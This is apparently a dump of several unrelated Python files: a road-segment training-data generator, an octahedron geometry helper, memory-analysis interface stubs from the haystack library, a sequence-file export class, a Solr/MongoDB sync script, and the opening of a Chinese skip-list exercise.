            'length': segment.length,
            'lines': len(segment) if is_intersection else 1,
            'pointx': segment.centroid.x,
            'pointy': segment.centroid.y,
            'records': len(records) if records else 0
        }
        # Add time offset aggregation data. Distinct names (range_max/range_min)
        # avoid clobbering the min_occurred/max_occurred parameters, which the
        # original loop shadowed.
        for range_max, range_min, records_label in year_ranges:
            if records:
                records_in_range = [
                    record for record in records
                    if range_min < record['occurred'] <= range_max
                ]
                data[records_label] = len(records_in_range)
            else:
                data[records_label] = 0
        segments_with_data.append((segment, data))
    return (schema, segments_with_data)
def write_segments_shp(segments_shp_path, road_projection, segments_with_data, schema):
    """Writes all segments to shapefile (both intersections and individual segments)
    :param segments_shp_path: Path to shapefile to write
    :param road_projection: Projection of road data
    :param segments_with_data: List of tuples containing segments and segment data
    :param schema: Schema to use for writing shapefile
    """
    with fiona.open(segments_shp_path, 'w', driver='ESRI Shapefile',
                    schema=schema, crs=road_projection) as output:
        # One feature per segment: its geometry plus the computed properties.
        for segment, data in segments_with_data:
            output.write({
                'geometry': mapping(segment),
                'properties': data
            })
def write__training_csv(segments_csv_path, segments_with_data, schema):
    """Writes all segments containing record data to csv for training
    :param segments_csv_path: Path to CSV to write
    :param segments_with_data: List of tuples containing segments and segment data
    :param schema: Schema to use for writing CSV
    """
    # Column order is the sorted schema property names, keeping output stable.
    field_names = sorted(schema['properties'])
    with open(segments_csv_path, 'w') as csv_file:
        writer = csv.DictWriter(csv_file, fieldnames=field_names)
        writer.writeheader()
        # Only segments that matched at least one record are useful for training.
        for _, data in segments_with_data:
            if data['records'] > 0:
                writer.writerow(data)
def main():
    """Main entry point of script: reads records and roads, builds combined
    road/intersection segments, and writes the shapefile and training CSV."""
    parser = argparse.ArgumentParser(description='Generate training input')
    # Required arguments
    parser.add_argument('roads_shp', help='Path to shapefile containing OSM road data')
    parser.add_argument('records_csv', help='Path to CSV containing record data')
    # Optional arguments. Numeric options declare type=int so command-line
    # values arrive as numbers; previously only the (int) defaults worked --
    # a user-supplied value stayed a string and broke e.g. Point.buffer().
    parser.add_argument('--output-dir', help='Directory where files are output', default='.')
    parser.add_argument('--combined-segments-shp-name', help='Combined segments output .shp name',
                        default='combined_segments.shp')
    parser.add_argument('--training-csv-name',
                        help='Training input .csv name',
                        default='training_input.csv')
    parser.add_argument('--intersection-buffer-units', help='Units to buffer each intersection',
                        type=int, default=5)
    parser.add_argument('--tile-max-units', help='Maximum units for each side of a tile',
                        type=int, default=3000)
    # NOTE(review): underscore spelling kept for CLI backward compatibility,
    # although the other options use hyphens.
    parser.add_argument('--max_line_units', help='Maximum units allowed for line segment',
                        type=int, default=200)
    parser.add_argument('--time-zone', help='Time zone of records', default='America/New_York')
    parser.add_argument('--match-tolerance', help='Units to buffer when matching records to roads',
                        type=int, default=5)
    parser.add_argument('--road-projection', help='Projection id of roads', default='epsg:32718')
    parser.add_argument('--record-projection', help='Projection id of records', default='epsg:4326')
    parser.add_argument('--record-col-id', help='Record column: id', default='CRN')
    parser.add_argument('--record-col-x', help='Record column: x-coordinate', default='LNG')
    parser.add_argument('--record-col-y', help='Record column: y-coordinate', default='LAT')
    parser.add_argument('--record-col-occurred', help='Record column: occurred',
                        default='DATETIME')
    args = parser.parse_args()
    logger.info('Reading records from {}'.format(args.records_csv))
    tz = pytz.timezone(args.time_zone)
    road_projection = {'init': args.road_projection}
    record_projection = {'init': args.record_projection}
    match_tolerance = args.match_tolerance
    records, min_occurred, max_occurred = read_records(
        args.records_csv, road_projection, record_projection, tz,
        args.record_col_id, args.record_col_x, args.record_col_y,
        args.record_col_occurred
    )
    logger.info('Found {:,} records between {} and {}'.format(
        len(records), min_occurred.date(), max_occurred.date())
    )
    logger.info('Reading shapefile from {}'.format(args.roads_shp))
    roads, road_bounds = read_roads(args.roads_shp, records, match_tolerance)
    logger.info('Number of relevant roads in shapefile: {:,}'.format(len(roads)))
    logger.info('Calculating intersections')
    int_buffers = get_intersection_buffers(roads, road_bounds, args.intersection_buffer_units,
                                           args.tile_max_units)
    logger.info('Getting intersection parts')
    int_multilines, non_int_lines = get_intersection_parts(roads, int_buffers, args.max_line_units)
    combined_segments = int_multilines + non_int_lines
    logger.info('Found {:,} intersection multilines'.format(len(int_multilines)))
    logger.info('Found {:,} non-intersection lines'.format(len(non_int_lines)))
    logger.info('Found {:,} combined segments'.format(len(combined_segments)))
    segments_with_records = match_records_to_segments(
        records, combined_segments, match_tolerance)
    logger.info('Found {:,} segments with records'.format(len(segments_with_records)))
    schema, segments_with_data = get_segments_with_data(
        combined_segments, segments_with_records, min_occurred, max_occurred
    )
    logger.info('Compiled data for {:,} segments'.format(len(segments_with_data)))
    segments_shp_path = os.path.join(args.output_dir, args.combined_segments_shp_name)
    write_segments_shp(segments_shp_path, road_projection, segments_with_data, schema)
    logger.info('Generated shapefile')
    training_csv_path = os.path.join(args.output_dir, args.training_csv_name)
    write__training_csv(training_csv_path, segments_with_data, schema)
    logger.info('Generated csv for training')
if __name__ == '__main__':
    main()
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import proj3d
#import sys
from vecPBC import vecPBC
# Takes the points of the square and adds the extra points to complete the octahedron
# This assumes the points going CW a,b,c,d
# 2 extra points to define
def PBC_check(vec, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax):
    """Wrap a 3D position back into the periodic box.

    Each component lying outside its [min, max] bound is shifted by one box
    length on that axis (a single wrap, matching the original behavior).
    The input sequence is modified in place and also returned.
    """
    bounds = ((Lxmin, Lxmax), (Lymin, Lymax), (Lzmin, Lzmax))
    for axis, (lo, hi) in enumerate(bounds):
        span = hi - lo
        if vec[axis] < lo:
            vec[axis] += span
        elif vec[axis] > hi:
            vec[axis] -= span
    return vec
def square_to_octahedron(self):
    """Adds the two apex particles that complete an octahedron from a square face.

    Reads the four square vertices from self.vertices / self.xyz, computes the
    two apex points along the square's plane normal at the center-to-vertex
    distance, wraps them into the periodic box, and appends them to self.xyz
    and self.vertices with particle type -1 (not a center particle and not
    part of the original square).
    """
    # Box bounds and side lengths for periodic wrapping
    Lxmax = self.boxBounds[0][1]
    Lxmin = self.boxBounds[0][0]
    Lymax = self.boxBounds[1][1]
    Lymin = self.boxBounds[1][0]
    Lzmax = self.boxBounds[2][1]
    Lzmin = self.boxBounds[2][0]
    Lx = Lxmax - Lxmin
    Ly = Lymax - Lymin
    Lz = Lzmax - Lzmin
    # NOTE(review): vertices are unpacked a, c, b, d (not a, b, c, d), preserved
    # from the original -- confirm this matches the caller's vertex ordering.
    a, c, b, d = self.vertices
    # np.float was removed in NumPy 1.24; plain float is the equivalent dtype.
    a = np.array(self.xyz[a][:self.dim], dtype=float)
    b = np.array(self.xyz[b][:self.dim], dtype=float)
    d = np.array(self.xyz[d][:self.dim], dtype=float)
    center = np.array([self.x, self.y, self.z], dtype=float)
    # Minimum-image vectors: particle center -> a, and the square edges a->d, a->b
    center_a = np.array(vecPBC(a, center, Lx, Ly, Lz), dtype=float)
    center_a_mag = np.sqrt(sum(i**2 for i in center_a))
    ad = np.array(vecPBC(d, a, Lx, Ly, Lz), dtype=float)
    ab = np.array(vecPBC(b, a, Lx, Ly, Lz), dtype=float)
    # Unit normal of the square's plane (ab x ad)
    abcrossad = np.cross(ab, ad)
    abcrossad_unit = abcrossad / np.sqrt(sum(i**2 for i in abcrossad))
    # The two apexes sit above and below the square's midpoint by the
    # center-to-vertex distance. The trailing -1 is the particle type,
    # meaning not a center particle and not part of the original square.
    midpoint = a + 0.5*ad + 0.5*ab
    for sign in (1.0, -1.0):
        new = midpoint + sign * center_a_mag * abcrossad_unit
        new = PBC_check(new, Lxmin, Lxmax, Lymin, Lymax, Lzmin, Lzmax)
        self.xyz[len(self.xyz)] = [i for i in new] + [-1]
        self.vertices.append(len(self.xyz) - 1)
|
<filename>deploy/virenv/lib/python2.7/site-packages/haystack/abc/interfaces.py
# -*- coding: utf-8 -*-
class IMemoryMapping(object):
    """Interface for a memory mapping.
    A IMemoryMapping should hold one of a process memory _memory_handler and its start and stop addresses.
    """
    def _vtop(self, vaddr):
        """Translates the virtual address to a physical address from the underlying storage.
        :param vaddr: long the virtual address.
        :return: the physical address in the underlying storage object for a virtual address
        :rtype: long
        """
        raise NotImplementedError(self)
    def _ptov(self, paddr):
        """Translates the physical address from the underlying storage to a virtual address.
        :param paddr: long the physical address.
        :return: the virtual address in the process memory from the physical address
        :rtype: long
        """
        raise NotImplementedError(self)
    def read_array(self, address, basetype, count):
        """Reads the memory content at address <address> and returns a typed array.
        :param address: long the virtual address.
        :param basetype: a ctypes class.
        :param count: long the size of the array.
        :return: the memory content at address, in array form
        :rtype: (basetype*count) ctypes class
        """
        raise NotImplementedError(self)
    def read_bytes(self, address, size):
        """Reads the memory content at address <address> and returns an array of bytes in a str.
        :param address: long the virtual address.
        :param size: long the size of the array.
        :return: the memory content at address, in a bytes string
        :rtype: str
        """
        raise NotImplementedError(self)
    def read_cstring(self, address, max_size, chunk_length=256):
        """Reads the memory content at address <address> and returns a python representation
        of the NULL terminated string.
        :param address: long the virtual address.
        :param max_size: long the maximum size of the string.
        :param chunk_length: (optional) long the number of bytes read at each buffer read.
        :return: the memory content at address, in a bytes string
        :rtype: str
        """
        raise NotImplementedError(self)
    def read_struct(self, address, struct):
        """Reads the memory content at address <address> and returns a ctypes record instance.
        :param address: long the virtual address.
        :param struct: a ctypes class.
        :return: the memory content at address, in ctypes record form
        :rtype: (struct) ctypes class
        """
        raise NotImplementedError(self)
    def read_word(self, address):
        """Reads the memory content at address <address> and returns a word's worth of it.
        Usually 4 or 8 bytes.
        :param address: long the virtual address.
        :return: the memory content at address, in a bytes string
        :rtype: str
        """
        raise NotImplementedError(self)
    def search(self, bytestr):
        """Search the memory for this particular sequence of bytes and iterates over the starting
        address of the results.
        :param bytestr: bytes str, the sequence of bytes to look for.
        :return: (iterator) long, the list of virtual address matching the byte pattern
        :rtype: iterator, long, the starting virtual address of the match
        """
        raise NotImplementedError(self)
    def __contains__(self, address):
        """Returns True when the virtual address falls within this mapping's range."""
        raise NotImplementedError(self)
    def __len__(self):
        # NOTE(review): presumably the byte length of the mapping -- confirm
        # against a concrete implementation.
        raise NotImplementedError(self)
class IMemoryLoader(object):
    """Parse a process memory _memory_handler from a storage concept,
    then identify its ITargetPlatform characteristics
    and produce an IMemoryHandler for this process memory dump """
    def make_memory_handler(self):
        """Returns an instance of IMemoryHandler
        :rtype: IMemoryHandler
        """
        raise NotImplementedError(self)
class IMemoryHandler(object):
    """Interface for the MemoryHandler class."""
    def get_name(self):
        """Returns the name of the process memory dump we are analysing"""
        raise NotImplementedError(self)
    # helper methods that do not impact the internals
    def get_target_platform(self):
        """Returns the ITargetPlatform for that process memory."""
        raise NotImplementedError(self)
    def get_heap_finder(self):
        """Returns the IHeapFinder for that process memory."""
        raise NotImplementedError(self)
    def get_model(self):
        """Returns the Model cache."""
        raise NotImplementedError(self)
    # class proper methods
    def get_mappings(self):
        """
        return the list of IMemoryMapping
        :return: list of IMemoryMapping
        """
        raise NotImplementedError(self)
    def reset_mappings(self):
        """
        Temporarily closes all files used by this handler.
        :return:
        """
        raise NotImplementedError(self)
    # reverse helper
    def get_reverse_context(self):
        """Returns the context object used by the reverse-engineering helpers."""
        raise NotImplementedError(self)
    def get_mapping_for_address(self, vaddr):
        """Returns the IMemoryMapping that contains this virtual address."""
        raise NotImplementedError(self)
    def iter_mapping_with_name(self, pathname):
        """Returns the IMemoryMapping _memory_handler with the name pathname"""
        raise NotImplementedError(self)
    def is_valid_address(self, obj, struct_type=None):
        """Return true if the virtual address is a valid address in a IMemoryMapping"""
        raise NotImplementedError(self)
    def is_valid_address_value(self, addr, struct_type=None):
        """Return true if the virtual address is a valid address in a IMemoryMapping"""
        raise NotImplementedError(self)
    def __contains__(self, vaddr):
        """Return true if the virtual address is a valid address in a IMemoryMapping"""
        raise NotImplementedError(self)
    def __len__(self):
        """Return the number of IMemoryMapping"""
        raise NotImplementedError(self)
    def __getitem__(self, i):
        """Returns the i-th IMemoryMapping."""
        raise NotImplementedError(self)
    def __setitem__(self, i, val):
        """Replaces the i-th IMemoryMapping."""
        raise NotImplementedError(self)
    def __iter__(self):
        """Iterates over the IMemoryMapping list."""
        raise NotImplementedError(self)
class IMemoryCache(object):
    """Interface for the MemoryCache class.
    Usage 1:
    + when one uses the model to load a record from the underlying memory, the record
    can be cached as to improve performance:
    - memory storage could be slow like in ProcessMemoryMapping
    Usage 2:
    + one can use this cache to store plain old python object equivalent of ctypes record
    when translating memory structure in python class, json, or other
    - circular dependencies can be resolved
    """
    def reset(self):
        """Clean the book: drop every cached reference."""
        raise NotImplementedError(self)
    def getRefs(self):
        """Lists all references to already loaded structs. Useful for debug"""
        raise NotImplementedError(self)
    def printRefs(self):
        """Prints all references to already loaded structs. Useful for debug"""
        raise NotImplementedError(self)
    def printRefsLite(self):
        """Prints all references to already loaded structs. Useful for debug"""
        raise NotImplementedError(self)
    def hasRef(self, typ, orig_addr):
        """Check if this type has already been loaded at this address"""
        raise NotImplementedError(self)
    def getRef(self, typ, orig_addr):
        """Returns the reference to the type previously loaded at this address"""
        raise NotImplementedError(self)
    def getRefByAddr(self, addr):
        """Returns the cached reference(s) stored for this address."""
        raise NotImplementedError(self)
    def keepRef(self, obj, typ=None, orig_addr=None):
        """Keeps a reference for an object of a specific type loaded from a specific
        address.
        Sometimes, you have to cast a c_void_p. You can keep ref in Ctypes object,
        they might be transient (if obj == somepointer.contents)."""
        # TODO, memory leak for different objects of same size, overlapping
        # struct.
        raise NotImplementedError(self)
    def delRef(self, typ, orig_addr):
        """Forget about a Ref."""
        raise NotImplementedError(self)
class ITargetPlatform(object):
    """The guest platform information for the process memory handled by IMemoryHandler.
    Immutable, its characteristics should be set once at creation time.
    """
    def get_word_type(self):
        """Returns the memory guest word base ctypes type (c_uint32 or c_uint64) """
        raise NotImplementedError(self)
    def get_word_type_char(self):
        """Returns the memory guest word base ctypes character (I or Q) """
        raise NotImplementedError(self)
    def get_word_size(self):
        """Returns the memory guest word base ctypes type size (4 or 8) """
        raise NotImplementedError(self)
    def get_target_ctypes(self):
        """Returns the ctypes proxy instance adequate for the target process' platform """
        raise NotImplementedError(self)
    def get_target_ctypes_utils(self):
        """Returns the ctypes utils instance with additional ctypes helper method
        :rtype: ICTypesUtils"""
        raise NotImplementedError(self)
    # NOTE(review): the two docstrings below say "host" although the class
    # describes the guest platform -- confirm against implementations.
    def get_os_name(self):
        """Returns the name of the host platform"""
        raise NotImplementedError(self)
    def get_cpu_bits(self):
        """Returns the cpu bits of the host platform"""
        raise NotImplementedError(self)
class IHeapFinder(object):
    """
    Parse the IMemoryHandler's list of IMemoryMapping to find process Heaps.
    The IHeapFinder needs to be initialized with a IMemoryHandler.
    """
    def list_heap_walkers(self):
        """
        Return the list of heaps that load as heaps
        :return: list of IMemoryMapping
        """
        # NOTE(review): the name suggests walkers while the docstring says
        # IMemoryMapping -- confirm the element type with an implementation.
        raise NotImplementedError(self)
    def get_heap_module(self):
        """
        Returns the heap module.
        :return: module
        """
        raise NotImplementedError(self)
    def get_heap_walker(self, heap):
        """
        return a IHeapWalker for that heap
        :param heap: IMemoryMapping
        :return: IHeapWalker
        """
        raise NotImplementedError(self)
class IHeapWalker(object):
    """
    Parse a heap IMemoryMapping for chunks of allocated memory or free chunks in the heap.
    The IHeapWalker needs to be initialized with a IMemoryHandler and a IMemoryMapping
    """
    def get_target_platform(self):
        """Returns the ITargetPlatform for that process memory Heap."""
        raise NotImplementedError(self)
    def get_heap_address(self):
        """ returns the address of the used heap
        :rtype: long
        """
        raise NotImplementedError('Please implement all methods')
    def get_user_allocations(self):
        """ returns all User allocations (addr,size)
        :rtype: iterable of (addr, size) tuples
        """
        raise NotImplementedError('Please implement all methods')
    def get_free_chunks(self):
        """ returns all free chunks in the heap (addr,size)
        :rtype: iterable of (addr, size) tuples
        """
        raise NotImplementedError('Please implement all methods')
class ICTypesUtils(object):
    """
    Some additional helper methods for ctypes
    """
    def formatAddress(self, addr):
        """Formats an address into a printable form (presumably hex -- confirm)."""
        raise NotImplementedError('Please implement all methods')
    def unpackWord(self, bytes, endianess):
        """Unpacks one machine word from the *bytes* buffer using *endianess*."""
        raise NotImplementedError('Please implement all methods')
    def is_address_local(self, obj, structType):
        """
        Costly , checks if obj is mapped to local memory space.
        Returns the memory mapping if found.
        False, otherwise.
        """
        raise NotImplementedError('Please implement all methods')
    def get_pointee_address(self, obj):
        """
        Returns the address of the struct pointed by the obj, or null if invalid.
        :param obj: a pointer.
        """
        raise NotImplementedError('Please implement all methods')
    def container_of(self, memberaddr, typ, membername):
        """
        From a pointer to a member, returns the parent struct.
        Returns the instance of typ(), in which the member *membername* really resides.
        Useful in some Kernel linked list which used members as prev,next pointers.
        :param memberaddr: the address of membername.
        :param typ: the type of the containing structure.
        :param membername: the membername.
        Stolen from linux kernel headers.
        const typeof( ((typ *)0)->member ) *__mptr = (ptr);
        (type *)( (char *)__mptr - offsetof(type,member) );})
        """
        raise NotImplementedError('Please implement all methods')
    def offsetof(self, typ, membername):
        """
        Returns the offset of a member in a structure.
        :param typ: the structure type.
        :param membername: the membername in that structure.
        """
        raise NotImplementedError('Please implement all methods')
    def ctypes_to_python_array(self, array):
        """Converts an array of undetermined Basic self.__ctypes class to a python array,
        by guessing its type from its class name.
        This is a bad example of introspection.
        """
        raise NotImplementedError('Please implement all methods')
    def array2bytes(self, array):
        """Converts an array of undetermined Basic self.__ctypes class to a byte string,
        by guessing its type from its class name.
        This is a bad example of introspection.
        """
        raise NotImplementedError('Please implement all methods')
    def bytes2array(self, bytes, typ):
        """Converts a bytestring in a self.__ctypes array of typ() elements."""
        raise NotImplementedError('Please implement all methods')
    def pointer2bytes(self, attr, nbElement):
        """
        Returns an array from a self.__ctypes POINTER, given the number of elements.
        :param attr: the structure member.
        :param nbElement: the number of element in the array.
        """
        raise NotImplementedError('Please implement all methods')
    def get_subtype(self, cls):
        """get the subtype of a pointer, array or basic type with haystack quirks."""
        raise NotImplementedError('Please implement all methods')
class IConstraintsConfigHandler(object):
    """Handles constraints as specified in a file"""
    def read(self, filename):
        """
        Parses the constraints file.
        :param filename: path of the constraints file to read.
        :return: the parsed constraints (presumably IModuleConstraints -- confirm)
        """
        # Previously this stub silently returned None; raise like every other
        # interface method in this module so a missing override is caught.
        raise NotImplementedError('Please implement all methods')
class IModuleConstraints(object):
    """Defines the constraints configuration for a number of records.
    Each structure is associated to a list of constraint per field of that record.
    x = IModuleConstraints()
    [...]
    x['struct_1'] contains a dict()
    x['struct_1']['field1'] contains a list of constraints.
    """
    def get_constraints(self):
        """
        get the mapping of record_type_name to the constraints for its fields
        :return dict
        """
        raise NotImplementedError('Please implement all methods')
    def set_constraints(self, record_type_name, record_constraints):
        """
        Add constraints for that record_type name
        :param record_type_name:
        :param record_constraints:
        :return
        """
        raise NotImplementedError('Please implement all methods')
    def get_dynamic_constraints(self):
        """
        get the record_type_name,IRecordTypeDynamicConstraintsValidator
        :return dict
        """
        raise NotImplementedError('Please implement all methods')
    def set_dynamic_constraints(self, record_type_name, record_constraints):
        """
        Add dynamic constraints validator for that record_type name
        :param record_type_name: str
        :param record_constraints: IRecordTypeDynamicConstraintsValidator
        :return:
        """
        raise NotImplementedError('Please implement all methods')
class IRecordConstraints(object):
    """
    Holds the constraints for fields of a specific record type.
    """
    def get_fields(self):
        """get the list of field names.
        :rtype: list of str
        """
        raise NotImplementedError('Please implement all methods')
    def get_constraints_for_field(self, field_name):
        """get the list of IConstraint for a field
        :param field_name: the field name.
        :rtype: list of IConstraint
        """
        raise NotImplementedError('Please implement all methods')
class IConstraint(object):
    """
    Defines a constraint validation test for a field.
    Class must implement __contains__.
    The test is : "if attr not in <IConstraint instance>"
    """
    def __contains__(self, obj):
        """Returns True when *obj* satisfies this constraint."""
        raise NotImplementedError('Please implement all methods')
class IRecordConstraintsValidator(object):
    """
    The worker class that validates all constraints for a record.
    """
    def is_valid(self, record):
        """
        Checks if each member field of record has coherent data
        with the constraints that exists for this record
        For each Field, check one of the following cases:
        a) basic types (check for expectedValues),
        if field has some expected values in expectedValues
        check field value against expectedValues[fieldname]
        if False, return False, else continue
        b) struct (check isValid)
        check if the inner struct isValid()
        if False, return False, else continue
        c) is an array, recurse validation
        d) Pointer (check valid_address or expectedValues is None == NULL)
        if field has some expected values in expectedValues
        ( None or 0 ) are the only valid options to designate NULL pointers
        check field get_pointee_address() value against expectedValues[fieldname] // if NULL
        if True (address is NULL and it's a valid value), continue
        check get_pointee_address against is_valid_address()
        if False, return False, else continue
        """
        raise NotImplementedError('Please implement all methods')
    def load_members(self, record, max_depth):
        """
        Presumably loads nested member records up to max_depth levels -- confirm.
        :param record: the record whose member fields to load.
        :param max_depth: maximum recursion depth.
        :return:
        """
        raise NotImplementedError('Please implement all methods')
class IRecordTypeDynamicConstraintsValidator(object):
    """
    A record-type-based constraints validation class
    """
    def get_record_type_name(self):
        """Return the name of the record_type for which these advanced checks can occur"""
        raise NotImplementedError('Please implement all methods')
    def is_valid(self, record):
        """
        Advanced checks that cannot be expressed in the constraints files
        :param record: the record instance to validate.
        :rtype: bool
        """
        raise NotImplementedError('Please implement all methods')
# TODO get_list_tuples |
<filename>web-interface/app/application/src/seqfiles/seqfile_bunch.py<gh_stars>0
import os.path
import gzip
from Bio import SeqIO
from application.src.samples.samples import Samples
from application.src.metatemplates.base.tempfile import TempFile
from .db import DBSeqFile
from .types import SeqFileTypes
class SeqFilesBunch(TempFile):
    """Collects the sequence files (consensus, contigs, scaffolds, reads)
    that belong to one sample and offers export helpers for them."""
    main_dir = "/uploads/samples"
    tempfilename = "last_generated_assembly_file.fasta"
    attachement_prefix = "fasta_"
    extension = "fasta"

    def __init__(self, sample_id: int):
        self.sample_id = sample_id
        self.sample = Samples.fetch("view_samples_base", self.sample_id)
        self.consensus_file = self._fetch_file(self.sample_id,
                                               SeqFileTypes.CONSENSUS_FILE)
        self.contigs_file = self._fetch_file(self.sample_id,
                                             SeqFileTypes.CONTIGS_FILE)
        self.scaffolds_file = self._fetch_file(self.sample_id,
                                               SeqFileTypes.SCAFFOLDS_FILE)
        self.read_files = self._get_reads()

    @classmethod
    def _fetch_file(cls, sample_id: int, sftype: SeqFileTypes) -> "SeqFile":
        """Load one sequence-file record and flag whether it exists on disk."""
        seqfile = DBSeqFile.get_seqfile(sample_id, sftype)
        seqfile.exists = seqfile.check_if_exists()
        return seqfile

    def _get_reads(self) -> list:
        """Return the read files: forward and reverse for paired layouts, else none."""
        read_files = []
        if self.sample["library_layout_paired"]:
            for read_type in (SeqFileTypes.FWREAD_FILE, SeqFileTypes.RVREAD_FILE):
                read_files.append(self._fetch_file(self.sample_id, read_type))
        return read_files

    def get_consensus_sequence(self):
        """Return the consensus sequence, headed with the GISAID virus name."""
        return self.consensus_file.get_sequence(header=self.sample["gisaid_virusname"])

    def write_gisiad_tempfile(self, file: str) -> None:
        """Write the consensus sequence to *file* as FASTA, renamed for GISAID."""
        if not self.consensus_file.exists:
            raise Exception("No consensus file found.")
        record = SeqIO.read(self.consensus_file.get_file(),
                            self.consensus_file.extension)
        record.id = self.sample["gisaid_virusname"]
        record.name = ""
        record.description = ""
        with open(file, "w") as outf:
            SeqIO.write(record, outf, "fasta")

    def zip_file_data(self, in_file: "file", out_file: str) -> None:
        """Gzip-compress *in_file* into *out_file*."""
        with open(in_file, 'rb') as f_in, gzip.open(out_file, 'wb') as f_out:
            f_out.writelines(f_in)

    def write_ena_contigs_tempfile(self, file: str) -> None:
        """Write the gzipped contigs file for ENA submission."""
        self.zip_file_data(self.contigs_file.get_file(), file)

    def write_ena_scaffolds_tempfile(self, file: str) -> None:
        """Write the gzipped scaffolds file for ENA submission."""
        self.zip_file_data(self.scaffolds_file.get_file(), file)

    def has_reads(self) -> bool:
        """True when every expected read file exists on disk."""
        return all(read.exists for read in self.read_files)

    def get_display_details(self) -> dict:
        """Collect display details for every file in the bunch."""
        return {
            "consensus": self.consensus_file.get_display_details(),
            "contigs": self.contigs_file.get_display_details(),
            "scaffolds": self.scaffolds_file.get_display_details(),
            "reads": [r.get_display_details() for r in self.read_files],
        }
|
#!/usr/bin/env python3
import os, sys
import traceback
from pymongo import MongoClient
import random
from bson.objectid import ObjectId
from solr import SOLR
from solr import SOLR_CORE_NAME
class SearchSolr():
    """Wrapper around a Solr core that loads documents and reshapes them
    either into flat instruction records (``flag=True``) or into QA records
    grouped by ``intent|entities`` (``flag=False``)."""

    def __init__(self, ip='127.0.0.1', solr_core=SOLR_CORE_NAME):
        self.solr_url = 'http://'+ ip +':8999/solr'
        self.solr_core = solr_core
        self.solr = SOLR(self.solr_url)

    def load_data(self, select='*:*', fields=None, max_num=10, flag=False):
        """Query the core and return a list of normalised documents.

        :param select: Solr query string
        :param fields: fields to request; defaults to [] (all fields).
            Fixed: was a mutable default argument (``fields=[]``).
        :param max_num: maximum number of documents to fetch
        :param flag: True -> flatten instruction docs, False -> group QA
            docs by intent/entities
        :return: list of dicts, or None when the query or transform fails
        """
        if fields is None:
            fields = []
        try:
            def pro_x(x):
                # flatten a Solr "instruction" document
                y = {}
                y['store_id'] = x['store_id'][0]
                y['category'] = x['category'][0]
                y['instruction'] = x['instruction'][0]
                if 'entities' in x:
                    y['entities'] = x['entities']
                else:
                    y['entities'] = ['']
                y['answers'] = x['answer']
                y['emotion_name'] = 'null'
                y['emotion_url'] = 'null'
                if 'media' in x:
                    y['media'] = x['media'][0]
                    y['timeout'] = '15'
                else:
                    y['media'] = 'null'
                    y['timeout'] = '0'
                return y

            Data = {}

            def pro_y(x):
                # accumulate question docs into Data, keyed by "intent|entities"
                y = {}
                y['store_id'] = x['store_id'][0]
                y['category'] = x['category'][0]
                y['intent'] = x['intent']
                y['questions'] = x['question']
                if 'entities' in x:
                    # NOTE(review): when present this is a list; the string
                    # concatenation below would then raise TypeError (caught
                    # by the except).  Confirm the intended schema.
                    y['entities'] = x['entities']
                else:
                    y['entities'] = ''
                if y['intent']+'|'+y['entities'] in Data:
                    Data[y['intent']+'|'+y['entities']]['questions'].append(x['question'][0])
                else:
                    Data[y['intent']+'|'+y['entities']] = y
                return y

            docs = self.solr.query_solr(self.solr_core,
                                        select, fields, max_num).docs
            if flag == True:
                data = [pro_x(x) for x in docs]
            else:
                # pro_y is called purely for its side effect of filling
                # Data; the grouped records are collected afterwards.
                # (The original built and immediately discarded a list here.)
                for x in docs:
                    pro_y(x)
                data = [Data[key] for key in Data.keys()]
            return data
        except Exception:
            # Fixed: bare "except:" also swallowed SystemExit and
            # KeyboardInterrupt.
            traceback.print_exc()
            return None
class Mongodb():
    """Writes knowledge-base collections to MongoDB (plus a ``<db>_test``
    shadow database) and re-indexes them into Solr."""

    def __init__(self, db_name, ip='127.0.0.1', port=27017):
        self.db_name = db_name
        self.db = MongoClient(ip, port)[db_name]
        self.db_test = MongoClient(ip, port)[db_name+'_test']
        self.solr_url = 'http://'+ ip +':8999/solr'
        self.solr_core = SOLR_CORE_NAME
        self.solr = SOLR(self.solr_url)

    def write(self, collection, data):
        """Drop and re-insert *collection* in both the main and test DBs.

        :return: 1 on success, 0 on any failure (traceback is printed).
        """
        try:
            self.db[collection].drop()
            # NOTE(review): Collection.insert() is deprecated/removed in
            # modern pymongo; insert_many() is the replacement.
            self.db[collection].insert(data)
            self.db_test[collection].drop()
            self.db_test[collection].insert(data)
            return 1
        except Exception:
            # Fixed: bare "except:" also swallowed SystemExit and
            # KeyboardInterrupt.
            traceback.print_exc()
            return 0

    def write_data2solr(self, collection):
        """Re-index one Mongo collection into Solr.

        Existing Solr docs for this scene/topic are deleted first.  QA
        documents are expanded so each question becomes its own Solr doc;
        'instruction' documents are indexed as-is.
        """
        query = 'scene_str:'+self.db_name+' AND topic_str:' +\
                collection
        self.solr.delete_solr_by_query(self.solr_core, query)
        for x in self.db[collection].find():
            data_one = x.copy()
            data_one['scene'] = self.db_name
            data_one['topic'] = collection
            data_one['_id'] = str(data_one['_id'])
            if collection in ['instruction']:
                self.solr.update_solr(data_one, self.solr_core)
                continue
            if 'super_intention' in data_one:
                if data_one['super_intention'] == '':
                    data_one['super_intention'] = 'null'
            # fan out: one Solr document per question variant
            data_one.pop('questions')
            for q in x['questions']:
                data_one['question'] = q
                data_one['question_ik'] = q
                data_one['question_cn'] = q
                self.solr.update_solr(data_one, self.solr_core)
if __name__ == '__main__':
    # Rebuild the 'bookstore' knowledge base: pull documents from Solr,
    # write them back to MongoDB (main + _test DBs), then re-index both
    # collections into Solr.
    mongo = Mongodb(db_name='bookstore')
    # instruction documents (flag=True -> flat instruction records)
    s = SearchSolr(solr_core='instruction')
    data = s.load_data(max_num=100, flag=True)
    mongo.write(collection='instruction', data=data)
    mongo.write_data2solr(collection='instruction')
    # QA documents grouped by intent (flag defaults to False)
    s = SearchSolr(solr_core='automata')
    data = s.load_data(max_num=100000)
    mongo.write(collection='automata', data=data)
    mongo.write_data2solr(collection='automata')
|
'''
设计跳表
不使用任何库函数,设计一个跳表。
跳表是在 O(log(n)) 时间内完成增加、删除、搜索操作的数据结构。跳表相比于树堆与红黑树,其功能与性能相当,
并且跳表的代码长度相较下更短,其设计思想与链表相似。
例如,一个跳表包含 [30, 40, 50, 60, 70, 90],然后增加 80、45 到跳表中,以下图的方式操作:
<NAME> [CC BY-SA 3.0], via Wikimedia Commons
跳表中有很多层,每一层是一个短的链表。在第一层的作用下,增加、删除和搜索操作的时间复杂度不超过 O(n)。
跳表的每一个操作的平均时间复杂度是 O(log(n)),空间复杂度是 O(n)。
在本题中,你的设计应该要包含这些函数:
bool search(int target) : 返回target是否存在于跳表中。
void add(int num): 插入一个元素到跳表。
